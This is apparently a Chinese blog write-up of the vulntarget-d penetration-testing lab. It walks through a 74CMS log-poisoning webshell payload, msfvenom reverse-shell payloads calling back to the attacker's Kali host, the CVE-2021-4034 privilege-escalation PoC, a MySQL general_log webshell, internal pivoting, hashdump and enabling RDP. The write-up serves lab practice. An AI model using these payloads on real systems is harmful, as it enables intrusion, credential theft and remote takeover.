VulnTarget-d

最新推荐文章于 2024-08-06 18:14:43 发布
最新推荐文章于 2024-08-06 18:14:43 发布
阅读量309 收藏 2
点赞数
分类专栏: 靶机练习 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47372600/article/details/131250278
版权

实验目标:获取内网Win7的flag
学习目标:通信隧道/免杀/文件包含漏洞/PHPmyadmin日志GetShell/权限提升
靶机下载:其中vulntarget-d为本次实验机器

百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p

》》》靶机信息《《《

#攻击机
OS:Kali 2022.2
NIC:192.168.1.4

#Web Server
OS:Ubuntu
Server:骑士CMS/宝塔
NIC1:192.168.1.6
NCI2:10.0.20.131/24
userpass:eval/vulntarget

#内网机器
OS:Windows 7
Server:PhPStudy
NIC:10.0.20.136/24
userpass:crow/admin

一:边界主机

1.1:GetShell

步骤一:使用Nmap对目标主机进行扫描,对开放的端口访问发现81端口为Web站点而8888端口为宝塔面板

nmap -sT 192.168.1.6

image.png
步骤二:访问81号端口的站点,发现为骑士CMS v6.0.20可寻找相关的版本漏洞存在任意文件包含漏洞
image.png
步骤三:使用插件Hackbar将访问生成的Shell的木马写入到目标服务器日志中…并到服务器中查看

#HTTP请求
URL:http://192.168.1.6:81//index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=<?php fputs(fopen("tx.php","w"),"<?php eval(\\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

#日志位置
/www/wwwroot/upload/data/Runtime/Logs/Home/年份_月份_日期.log

image.png
image.png
步骤四:开始进行文件包含且在upload目录下存在了tx.php文件…

URL:http://192.168.1.6:81/index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=data/Runtime/Logs/Home/23_03_17.log

步骤五:在浏览器中访问生成的tx.php一句话木马并使用蚁剑进行链接…发现www用户的低权限…
image.png
image.png

1.2:权限提升

步骤六:尝试进行提权,使用MSF生成马并上传至目标主机中运行后上线…

#生成木马
>MSF5执行命令
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=8888 -f elf > mshell.elf
>MSF6执行命令
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.1.4 LPORT=8888 -f elf > mshell.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.0.24 LPORT=8888 -f elf > mshell.elf
chmod 777 mshell.elf
-p/--payload:指定木马运行的平台
LHOST:Kali攻击机的IP地址
LPORT:Kali攻击机监听的端口
-f/--filetype: 指定产生文件的类型
> :输出重定向操作符
meterpreter -->控制通道 

#开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.4
set lport 8888
show options
run

image.png
步骤七:进入到/home/eval/Desktop目录下发现Flag信息…
image.png
步骤八:根据uname -a执行命令信息可尝试使用CVE-2021-4034进行提权…下载以下项目并执行即可提权成功…

#项目地址
https://github.com/arthepsy/CVE-2021-4034

#执行命令
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc

image.png

二:内网主机

步骤一:进行内网信息收集可看到另一个网段的网卡,在MSF中添加路由并设置代理…

#信息收集
ifconfig

#添加路由
use post/multi/manage/autoroute
set session 1
run

#添加代理
use auxiliary/server/socks_proxy
run

image.png
步骤二:使用MSF中的auxiliary/scanner/portscan/tcp模块进行主机存活扫描…

msf6 auxiliary(server/socks_proxy) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 21,22,23,80,443,8080,3389,445
PORTS => 21,22,23,80,443,8080,3389,445
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.20.0/24
RHOSTS => 10.0.20.0/24
msf6 auxiliary(scanner/portscan/tcp) > set threads 50
threads => 50
msf6 auxiliary(scanner/portscan/tcp) > run

image.png
步骤三:通过配置proxychains的代理且使用Nmap对目标进行端口开放扫描…发现还开发3306端口…

proxychains nmap -sT -Pn 10.0.20.136 -p22,23,80,139,445,1433,3306,3389,6379,8080

image.png

2.1:GetShell

步骤四:配置浏览器代理访问其内网地址10.0.20.136的80与3306端口…没啥特别的

proxychains curl http://10.0.20.136/
proxychains mysql -h 10.0.20.136 -u root -p

image.png
步骤五:使用目录扫描工具进行敏感目录扫描,发现存在PHPMyadmin目录访问且尝试登录…

http://10.0.20.136/phpmyadmin/
http://10.0.20.136/phpinfo.php
http://10.0.20.136/l.php

image.png
image.png
步骤六:使用root:root默认密码成功登陆且在phpinfo.php页面发现存在站点绝对路径,通过写日志来GetShell…

#绝对路径
C:\phpstudy\PHPTutorial\WWW\phpinfo.php

#Getshell
show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php @eval($_POST["vuln"]); ?>';     //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

image.png
步骤七:配置蚁剑代理并连接Shell,成功!
image.png

2.2:上线MSF

步骤八:执行以下命令进行信息收集…

whoami --》   win-d4s86jo2r26\crow
ipconfig /all       --》工作组:10.0.20.136
ping www.baidu.com  --》不出网络环境
net user crow   --》 管理员组
tasklist /svc   --》 存在火绒

步骤九:由于内网主机是不出网而且存在火绒所以这里做一个正向免杀马进行连接…连接成功!

#免杀马

#正向连接
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2023
set rhost 10.0.20.136
run

image.png
步骤十:提升权限抓取明文密码进行破解…开启远程桌面连接登陆 Bingo!!!

#执行命令  
getsystem     //ok
hashdump      //admin密码为空;crow密码为admin;
run post/windows/manage/enable_rdp    //ok

image.png
image.png
》》》总体感受《《《

  • 正常的内网攻击套路,重点考察免杀这块!!!

参考链接:

https://xz.aliyun.com/t/8596#toc-6
https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg
https://blog.csdn.net/tlovejr/article/details/123845297
BearSec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 2808
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
VulnTarget-d靶场
zjxxxy的博客
08-08 229
vulntarget-d靶场攻略
vulntarget】系列:vulntarget-d 练习WP
一只爱吃橙子的羊
07-16 687
vulntarget】系列:vulntarget-d 练习WP
乌鸦安全2022年度文章合集
crowsec
01-05 1324
乌鸦安全2022年精选原创文章合集,基本上大部分都是原创,当然还有一部分文章由其他师傅投稿提供,在此感谢各位师傅的投稿和帮助!
Vulntarget靶场渗透笔记[持续更新中]
派大星的博客
04-08 7028
Vulntarget靶场渗透笔记 文章目录Vulntarget靶场渗透笔记靶场官方链接Vulntarget-aWriteup网络拓扑环境信息收集win7 MSF上线横向移动win2016cs上线msf上线域渗透域内提权 靶场官方链接 https://github.com/crow821/vulntarget Vulntarget-a Writeup vulntarget漏洞靶场系列(一) 渗透测试练习No.62 内网渗透 vulntarget-a Win7:win7/admin win2016:Admini
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。...
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6040
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
vulntarget漏洞靶场-vulntarget-b
aming小老弟
07-19 3216
vuln靶场
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8367
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 454
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
水域救援设备,保护水域安全_鼎跃安全
最新发布
ShenZhenDingYue的博客
08-06 191
当然,水域安全问题不仅需要水域救援人员和设备的保障,还需要我们每个人进行水域安全知识的学习和培训,严格遵守当地的水域安全管理条例,在进行水域活动时,尽量结伴而行,保持联系。这些水域安全设备能够为我们水域活动提供保障,也可以提供水域救援的效率,降低安全风险,保障生命安全。与此同时,随着水域经济的蓬勃发展,各类水上及水下娱乐活动日益丰富多样,从刺激的冲浪、潜水到悠闲的划船、垂钓,无一不吸引着四面八方的游客纷至沓来,享受水上乐趣。绳子具有浮力,方便在水面使用,用于远距离救援,将绳子抛给落水者。
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 768
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 888
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
域名安全详解
TechEnthusiast的博客
08-06 90
域名安全网络安全的重要组成部分,涉及多个方面。
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 683
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 645
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
AI技术如何重塑企业EHS安全健康环保体系,附实践案例
云说智数的博客
08-06 390
在某大型电子工厂中,AI系统通过分析生产数据和环境监测数据,成功预测了一起可能的化学泄漏事故,并及时通知了管理人员采取措施,避免了潜在的环境污染和人员伤亡。某化工厂在发生泄漏事故后,利用AI系统对事故进行了深入分析,不仅快速定位了泄漏源,还发现了操作规程中的缺陷,并据此更新了操作手册,提高了整体的安全管理水平。通过这些实际应用案例,我们可以看到AI技术在EHS管理中的应用潜力和实际效果,它不仅提高了风险管理的效率和准确性,还增强了企业对复杂EHS挑战的应对能力。
【SQL Server】端口安全配置:SQL Server的安全最佳实践与防火墙规则配置
weixin_43298211的博客
08-03 953
在进行任何网络或数据库系统的部署时,确保安全是至关重要的。SQL Server,作为企业级数据库平台,提供了丰富且强大的安全功能。使用加密连接是保护 SQL Server 通信安全的重要手段。防火墙是 SQL Server 安全的第一道防线。完成上述步骤后,Windows 防火墙将允许端口 1434 上的流量,从而确保 SQL Server 可以接收客户端连接。命令配置 SQL Server 使用证书进行加密连接。在上面的示例中,先加载必要的 PowerShell 模块,定义了证书的拇指印。
vulntarget-j
09-18
vulntarget-j 是一种安全测试平台,旨在模拟真实网络环境中的漏洞,以便于安全专业人员进行渗透测试和漏洞分析。该平台提供了一系列虚拟机和漏洞环境,使用户能够模拟并测试真实世界中常见的漏洞攻击。vulntarget-j 不仅可以用于入侵测试,还可以用于培训和教育目的。 vulntarget-j 的虚拟机和漏洞环境包括各种常见的漏洞和安全漏洞,例如操作系统漏洞、Web应用程序漏洞、网络服务漏洞等。用户可以使用这些虚拟机来发起各种类型的攻击,如恶意代码注入、SQL注入、跨站脚本等。除了这些预设的虚拟机,用户还可以创建自己的漏洞环境,以满足特定的安全测试需求。 vulntarget-j 还提供了一个用户友好的界面和工具集,使用户能够轻松配置和管理虚拟机和漏洞环境。用户可以根据自己的需求选择不同的配置选项,并且可以随时修改和更新环境。另外,该平台还提供了详细的文档和教程,帮助用户更好地了解和使用平台功能。 总而言之,vulntarget-j 是一个功能强大且易于使用的安全测试平台,适用于安全专业人员进行渗透测试和漏洞分析。它提供了各种虚拟机和漏洞环境,使用户可以模拟并测试现实世界中的漏洞攻击。此外,它还具有用户友好的界面和工具集,并提供了详细的文档和教程,帮助用户更好地使用平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值